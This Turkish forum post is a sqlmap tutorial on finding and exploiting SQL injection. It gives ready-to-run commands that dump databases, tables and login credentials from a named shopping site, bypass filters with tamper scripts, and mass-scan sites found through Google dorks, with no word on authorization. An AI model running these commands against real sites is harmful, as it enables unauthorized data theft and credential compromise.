Siber Güvenlik Forumu
SQLMap Kullanımı - Web Uygulamalarında SQL Enjeksiyon Tehditlerini Keşfetme - Baskı Önizleme

+- Siber Güvenlik Forumu (https://forum.alikaanbashan.org)
+-- Forum: Siber Güvenlik (https://forum.alikaanbashan.org/forum-Siber-G%C3%BCvenlik-10)
+--- Forum: Attacks (https://forum.alikaanbashan.org/forum-Attacks-14)
+--- Konu Başlığı: SQLMap Kullanımı - Web Uygulamalarında SQL Enjeksiyon Tehditlerini Keşfetme (/konu-SQLMap-Kullan%C4%B1m%C4%B1-Web-Uygulamalar%C4%B1nda-SQL-Enjeksiyon-Tehditlerini-Ke%C5%9Ffetme-298)



SQLMap Kullanımı - Web Uygulamalarında SQL Enjeksiyon Tehditlerini Keşfetme - LASİODORA - 02-16-2024

Kurulum
  • İlk adım olarak, SQLMap'ı bilgisayarınıza indirin ve kurulumunu gerçekleştirin. SQLMap, Python tabanlı bir araç olduğu için Python yüklü olmalıdır.
  • Windows kullanıcıları için, SQLMap'in GitHub deposundan ZIP dosyasını indirip, dosyaları bir klasöre çıkartabilirsiniz. Linux kullanıcıları için, SQLMap genellikle dağıtım depolarında bulunur ve apt veya yum gibi paket yöneticileri aracılığıyla yüklenebilir.

Temel Kullanım

  • Terminal veya komut istemcisini açın ve SQLMap'i çalıştırın.
  • SQLMap'in ana kullanım biçimi, hedef URL'yi belirtmek ve ardından gerekli seçenekleri eklemektir.
     ÖRNEĞİN : sqlmap -u "http://example.com/login.php?id=1"
Tarama Seçenekleri
SQLMap, birçok tarama seçeneği sunar. --dbs seçeneği, tüm veritabanlarını listeler. --tables, --columns, --dump gibi diğer seçenekler, veritabanındaki tabloları ve sütunları incelemek için kullanılabilir.

Parametler ve Payloadlar
  • SQLMap, GET veya POST parametrelerine otomatik olarak SQL enjeksiyon payloads ekler. Bununla birlikte, bazı durumlarda manuel olarak parametreleri belirtmek gerekir.
  • Örneğin: --data veya --data-binary seçenekleri, POST verilerini belirtmek için kullanılır.

Şimdi bunları daha detaylı bir şekilde ve daha somut örneklerle anlatalım.

Hedef URL Belirleme
  • SQLMap'i kullanmadan önce hedef web uygulamasının URL'sini belirleyelim. 
Kod:
http://alisverismarketim.com/login.php?id=1
Tarama Seçenekleri
Kod:
# Tüm veritabanlarını listele
sqlmap -u " http://alisverismarketim.com/login.php?id=1 " --dbs

# Belirli bir veritabanındaki tabloları listele
sqlmap -u " http://alisverismarketim.com/login.php?id=1 " -D dbname --tables

# Bir tablodaki sütunları listele
sqlmap -u " http://alisverismarketim.com/login.php?id=1 " -D dbname -T tablename --columns

# Veritabanından veri çek
sqlmap -u " http://alisverismarketim.com/login.php?id=1 " -D dbname -T tablename --dump
Diyelim ki username ve password kısmını çektik şimdi erişim iznine bakalım.

Kod:
sqlmap -u " http://alisverismarketim.com/login.php?id=1 " --data="username=test&password=test"
Son olarak ise daha gelişmiş tarama ve parametlere bakalım.

Kod:
# Enjeksiyon testlerinin agresifliğini belirler
sqlmap -u " http://alisverismarketim.com/login.php?id=1 " --level=5

# Enjeksiyon testlerinin risk seviyesini belirler
sqlmap -u " http://alisverismarketim.com/login.php?id=1 " --risk=3

# Çoklu iş parçacığı kullanarak taramayı hızlandırır
sqlmap -u " http://alisverismarketim.com/login.php?id=1 " --threads=10

# Tarama için bir HTTP proxy'si belirtir
sqlmap -u " http://alisverismarketim.com/login.php?id=1 " --proxy="http://127.0.0.1:8080"

# HTTP istekleri üzerinde otomatik olarak değişiklik yapmak için kullanılır
sqlmap -u "http://alisverismarketim.com/login.php?id=1" --tamper="space2comment.py"
Dork Tarama
Her şeyin yanı sıra yazdığınız dorku SQLMap üzerinden tarayabilirsiniz.

Kod:
sqlmap -g "index.php?=12" --dbs